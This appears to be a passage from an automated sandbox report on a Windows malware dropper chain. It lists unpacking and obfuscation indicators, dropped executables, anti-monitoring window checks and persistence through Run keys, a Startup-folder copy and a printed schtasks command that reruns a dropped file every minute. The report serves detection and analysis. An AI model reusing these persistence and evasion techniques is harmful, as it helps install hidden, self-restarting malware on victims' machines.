Source:	Binary string: D:\a\1\b\bin\amd64\_decimal.pdb$$ source: _decimal.pyd.20.dr
Source:	Binary string: mscorlib.pdb source: WERCCA3.tmp.dmp.29.dr, WERDA3F.tmp.dmp.36.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: 3Mv6i65.exe, 00000014.00000003.2103031744.0000025DDB9AE000.00000004.00000020.00020000.00000000.sdmp, 3Mv6i65.exe, 00000015.00000002.2802608168.00007FFB23A4C000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WERCCA3.tmp.dmp.29.dr, WERDA3F.tmp.dmp.36.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: 3Mv6i65.exe, 00000014.00000003.2103031744.0000025DDB9AE000.00000004.00000020.00020000.00000000.sdmp, 3Mv6i65.exe, 00000015.00000002.2802608168.00007FFB23A4C000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: 3Mv6i65.exe, 00000014.00000003.2101706876.0000025DDB9AE000.00000004.00000020.00020000.00000000.sdmp, 3Mv6i65.exe, 00000015.00000002.2816902176.00007FFB23A6E000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: 3Mv6i65.exe, 00000014.00000003.2103500843.0000025DDB9AE000.00000004.00000020.00020000.00000000.sdmp, 3Mv6i65.exe, 00000015.00000002.2828855279.00007FFB23AD4000.00000002.00000001.01000000.00000016.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: 3Mv6i65.exe, 00000014.00000003.2103305041.0000025DDB9AE000.00000004.00000020.00020000.00000000.sdmp, 3Mv6i65.exe, 00000015.00000002.2778234143.00007FFB22769000.00000002.00000001.01000000.00000018.sdmp, _socket.pyd.20.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_wmi.pdb''&GCTL source: 3Mv6i65.exe, 00000014.00000003.2103500843.0000025DDB9AE000.00000004.00000020.00020000.00000000.sdmp, 3Mv6i65.exe, 00000015.00000002.2828855279.00007FFB23AD4000.00000002.00000001.01000000.00000016.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: 3Mv6i65.exe, 00000014.00000003.2101423522.0000025DDB9AE000.00000004.00000020.00020000.00000000.sdmp, 3Mv6i65.exe, 00000015.00000002.2790258052.00007FFB22785000.00000002.00000001.01000000.00000017.sdmp, VCRUNTIME140_1.dll.20.dr
Source:	Binary string: System.ni.pdb source: WERCCA3.tmp.dmp.29.dr, WERDA3F.tmp.dmp.36.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Unpacked PE file: 13.2.KI2Q1PIQVVVTNGJPW8.exe.440000.0.unpack :EW;.rsrc:W;.idata :W; :EW;msqrvkkl:EW;yhfmgyon:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;msqrvkkl:EW;yhfmgyon:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Unpacked PE file: 19.2.JqGBbm7.exe.f90000.0.unpack :EW;.rsrc:W;.idata :W;cmtgbjjz:EW;amlicovq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;cmtgbjjz:EW;amlicovq:EW;.taggant:EW;

.NET source code contains method to dynamically call methods (often used by packers)

Source: d0HNrLB[1].exe.15.dr, gBMthepoZSL1ZVKpeA.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: d0HNrLB.exe.15.dr, gBMthepoZSL1ZVKpeA.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: d0HNrLB.exe.26.dr, gBMthepoZSL1ZVKpeA.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: d0HNrLB.exe0.26.dr, gBMthepoZSL1ZVKpeA.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: 33.2.d0HNrLB.exe.353e970.0.raw.unpack, Helper.cs

.Net Code: Plugin System.Reflection.Assembly.Load(byte[])

Source: d0HNrLB[1].exe.15.dr

Static PE information: 0xB00FDD35 [Wed Aug 8 20:14:45 2063 UTC]

Source: C:\Users\user\Desktop\S2W2ftXM2b.exe

Code function: 0_2_00CF2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,

0_2_00CF2F1D

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: rapes.exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x74722
Source: JqGBbm7[1].exe.15.dr	Static PE information: real checksum: 0x2e433e should be: 0x2e2fec
Source: JqGBbm7.exe.15.dr	Static PE information: real checksum: 0x2e433e should be: 0x2e2fec
Source: d0HNrLB.exe.15.dr	Static PE information: real checksum: 0x0 should be: 0x51e90
Source: JCFx2xj.exe.15.dr	Static PE information: real checksum: 0xc6df8d should be: 0x871e8d
Source: khykuQw[1].exe.15.dr	Static PE information: real checksum: 0x0 should be: 0x79ea53
Source: zY9sqWs.exe.15.dr	Static PE information: real checksum: 0x0 should be: 0x6997b
Source: khykuQw.exe.15.dr	Static PE information: real checksum: 0x0 should be: 0x79ea53
Source: d0HNrLB[1].exe.15.dr	Static PE information: real checksum: 0x0 should be: 0x51e90
Source: 1s89v4.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x74722
Source: zY9sqWs[1].exe.15.dr	Static PE information: real checksum: 0x0 should be: 0x6997b
Source: 2X0520.exe.0.dr	Static PE information: real checksum: 0x31c8c7 should be: 0x31b28f
Source: JCFx2xj[1].exe.15.dr	Static PE information: real checksum: 0xc6df8d should be: 0x871e8d
Source: d0HNrLB.exe0.26.dr	Static PE information: real checksum: 0x0 should be: 0x51e90
Source: bPDDW9F.exe.15.dr	Static PE information: real checksum: 0x148668 should be: 0x1552a3
Source: KI2Q1PIQVVVTNGJPW8.exe.8.dr	Static PE information: real checksum: 0x1dc43d should be: 0x1d5d08
Source: d0HNrLB.exe.26.dr	Static PE information: real checksum: 0x0 should be: 0x51e90
Source: bPDDW9F[1].exe.15.dr	Static PE information: real checksum: 0x148668 should be: 0x1552a3

Source: 2X0520.exe.0.dr	Static PE information: section name:
Source: 2X0520.exe.0.dr	Static PE information: section name: .idata
Source: 2X0520.exe.0.dr	Static PE information: section name: tufaeipj
Source: 2X0520.exe.0.dr	Static PE information: section name: dmhecdbp
Source: 2X0520.exe.0.dr	Static PE information: section name: .taggant
Source: KI2Q1PIQVVVTNGJPW8.exe.8.dr	Static PE information: section name:
Source: KI2Q1PIQVVVTNGJPW8.exe.8.dr	Static PE information: section name: .idata
Source: KI2Q1PIQVVVTNGJPW8.exe.8.dr	Static PE information: section name:
Source: KI2Q1PIQVVVTNGJPW8.exe.8.dr	Static PE information: section name: msqrvkkl
Source: KI2Q1PIQVVVTNGJPW8.exe.8.dr	Static PE information: section name: yhfmgyon
Source: KI2Q1PIQVVVTNGJPW8.exe.8.dr	Static PE information: section name: .taggant
Source: JCFx2xj[1].exe.15.dr	Static PE information: section name: .symtab
Source: JqGBbm7[1].exe.15.dr	Static PE information: section name:
Source: JqGBbm7[1].exe.15.dr	Static PE information: section name: .idata
Source: JqGBbm7[1].exe.15.dr	Static PE information: section name: cmtgbjjz
Source: JqGBbm7[1].exe.15.dr	Static PE information: section name: amlicovq
Source: JqGBbm7[1].exe.15.dr	Static PE information: section name: .taggant
Source: JqGBbm7.exe.15.dr	Static PE information: section name:
Source: JqGBbm7.exe.15.dr	Static PE information: section name: .idata
Source: JqGBbm7.exe.15.dr	Static PE information: section name: cmtgbjjz
Source: JqGBbm7.exe.15.dr	Static PE information: section name: amlicovq
Source: JqGBbm7.exe.15.dr	Static PE information: section name: .taggant
Source: 3Mv6i65[1].exe.15.dr	Static PE information: section name: .fptable
Source: 3Mv6i65.exe.15.dr	Static PE information: section name: .fptable
Source: JCFx2xj.exe.15.dr	Static PE information: section name: .symtab
Source: bPDDW9F[1].exe.15.dr	Static PE information: section name: .xdata
Source: bPDDW9F.exe.15.dr	Static PE information: section name: .xdata
Source: d0HNrLB[1].exe.15.dr	Static PE information: section name: .CSS
Source: d0HNrLB.exe.15.dr	Static PE information: section name: .CSS
Source: VCRUNTIME140.dll.20.dr	Static PE information: section name: fothk
Source: VCRUNTIME140.dll.20.dr	Static PE information: section name: _RDATA
Source: libcrypto-3.dll.20.dr	Static PE information: section name: .00cfg
Source: python312.dll.20.dr	Static PE information: section name: PyRuntim
Source: d0HNrLB.exe.26.dr	Static PE information: section name: .CSS
Source: d0HNrLB.exe0.26.dr	Static PE information: section name: .CSS

Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	Code function: 0_2_00CF724D push ecx; ret	0_2_00CF7260
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Code function: 2_2_00F872EF pushad ; iretd	2_2_00F872F0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Code function: 2_2_00F8E506 pushad ; iretd	2_2_00F8E50E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Code function: 2_2_00F99FC1 push ecx; ret	2_2_00F99FD4
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 6_2_004872EF pushad ; iretd	6_2_004872F0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 6_2_00499FC1 push ecx; ret	6_2_00499FD4
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 14_2_004872EF pushad ; iretd	14_2_004872F0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 14_2_00499FC1 push ecx; ret	14_2_00499FD4
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 15_2_004872EF pushad ; iretd	15_2_004872F0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 15_2_00499FC1 push ecx; ret	15_2_00499FD4

Source: 2X0520.exe.0.dr	Static PE information: section name: entropy: 7.254683809674853
Source: KI2Q1PIQVVVTNGJPW8.exe.8.dr	Static PE information: section name: entropy: 7.976025619889402
Source: KI2Q1PIQVVVTNGJPW8.exe.8.dr	Static PE information: section name: msqrvkkl entropy: 7.953457928763214
Source: JqGBbm7[1].exe.15.dr	Static PE information: section name: entropy: 7.987624463356723
Source: JqGBbm7.exe.15.dr	Static PE information: section name: entropy: 7.987624463356723

Source: d0HNrLB[1].exe.15.dr, GSKpiUyewQVjl3ll2g.cs	High entropy of concatenated method names: 'N64lIWiqvs', 'y3qlLpN8VK', 'ahKlWAIBS3', 'TF7lOb8J3f', 'jgnloPbgcx', 'ra2lnByEPY', 'Gbml9SnirQ', 'XAylfpE7m9', 'wwNljlVFDW', 'qAplaZYBVp'
Source: d0HNrLB[1].exe.15.dr, gBMthepoZSL1ZVKpeA.cs	High entropy of concatenated method names: 'reTlcDMFua', 'nW4lBacjpc', 'sMLlkdoJ60', 'I5LlJVOMeQ', 'qdll7OAZFb', 'QEmlZSRGOw', 'NsqrSNUpN', 'N15X2cY3J', 'NWNp5BRFs', 'Q59l6jZOT'
Source: d0HNrLB.exe.15.dr, GSKpiUyewQVjl3ll2g.cs	High entropy of concatenated method names: 'N64lIWiqvs', 'y3qlLpN8VK', 'ahKlWAIBS3', 'TF7lOb8J3f', 'jgnloPbgcx', 'ra2lnByEPY', 'Gbml9SnirQ', 'XAylfpE7m9', 'wwNljlVFDW', 'qAplaZYBVp'
Source: d0HNrLB.exe.15.dr, gBMthepoZSL1ZVKpeA.cs	High entropy of concatenated method names: 'reTlcDMFua', 'nW4lBacjpc', 'sMLlkdoJ60', 'I5LlJVOMeQ', 'qdll7OAZFb', 'QEmlZSRGOw', 'NsqrSNUpN', 'N15X2cY3J', 'NWNp5BRFs', 'Q59l6jZOT'
Source: d0HNrLB.exe.26.dr, GSKpiUyewQVjl3ll2g.cs	High entropy of concatenated method names: 'N64lIWiqvs', 'y3qlLpN8VK', 'ahKlWAIBS3', 'TF7lOb8J3f', 'jgnloPbgcx', 'ra2lnByEPY', 'Gbml9SnirQ', 'XAylfpE7m9', 'wwNljlVFDW', 'qAplaZYBVp'
Source: d0HNrLB.exe.26.dr, gBMthepoZSL1ZVKpeA.cs	High entropy of concatenated method names: 'reTlcDMFua', 'nW4lBacjpc', 'sMLlkdoJ60', 'I5LlJVOMeQ', 'qdll7OAZFb', 'QEmlZSRGOw', 'NsqrSNUpN', 'N15X2cY3J', 'NWNp5BRFs', 'Q59l6jZOT'
Source: d0HNrLB.exe0.26.dr, GSKpiUyewQVjl3ll2g.cs	High entropy of concatenated method names: 'N64lIWiqvs', 'y3qlLpN8VK', 'ahKlWAIBS3', 'TF7lOb8J3f', 'jgnloPbgcx', 'ra2lnByEPY', 'Gbml9SnirQ', 'XAylfpE7m9', 'wwNljlVFDW', 'qAplaZYBVp'
Source: d0HNrLB.exe0.26.dr, gBMthepoZSL1ZVKpeA.cs	High entropy of concatenated method names: 'reTlcDMFua', 'nW4lBacjpc', 'sMLlkdoJ60', 'I5LlJVOMeQ', 'qdll7OAZFb', 'QEmlZSRGOw', 'NsqrSNUpN', 'N15X2cY3J', 'NWNp5BRFs', 'Q59l6jZOT'

Persistence and Installation Behavior

Found pyInstaller with non standard icon

Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe

Process created: "C:\Users\user~1\AppData\Local\Temp\10068150101\3Mv6i65.exe"

Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	File created: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\3Mv6i65[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10077730101\JCFx2xj.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\khykuQw[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	File created: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI14082\libffi-8.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI14082\libcrypto-3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10077160101\bPDDW9F.exe	File created: C:\Users\user\AppData\Local\Temp\WinTemp\Microsoft Edge Protect.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI14082\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI14082\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI14082\python312.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\zY9sqWs[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI14082\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\d0HNrLB[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI14082\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d0HNrLB.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\JqGBbm7[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI14082\VCRUNTIME140_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI14082\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI14082\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\bPDDW9F[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	File created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI14082\_wmi.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\JCFx2xj[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10075800101\zY9sqWs.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI14082\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI14082\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10077160101\bPDDW9F.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI14082\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Jump to dropped file

Source: C:\Users\user\Desktop\S2W2ftXM2b.exe

Code function: 0_2_00CF1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,

0_2_00CF1AE8

Boot Survival

Drops PE files to the startup folder

Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d0HNrLB.exe

Jump to dropped file

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "d0HNrLB" /tr "C:\Users\user\AppData\Roaming\d0HNrLB.exe"

Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d0HNrLB.exe

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe

File created: C:\Windows\Tasks\rapes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d0HNrLB.exe

Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0	Jump to behavior
Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0	Jump to behavior
Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0	Jump to behavior
Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d0HNrLB
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d0HNrLB

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe

Code function: 2_2_00F990ED GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

2_2_00F990ED

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
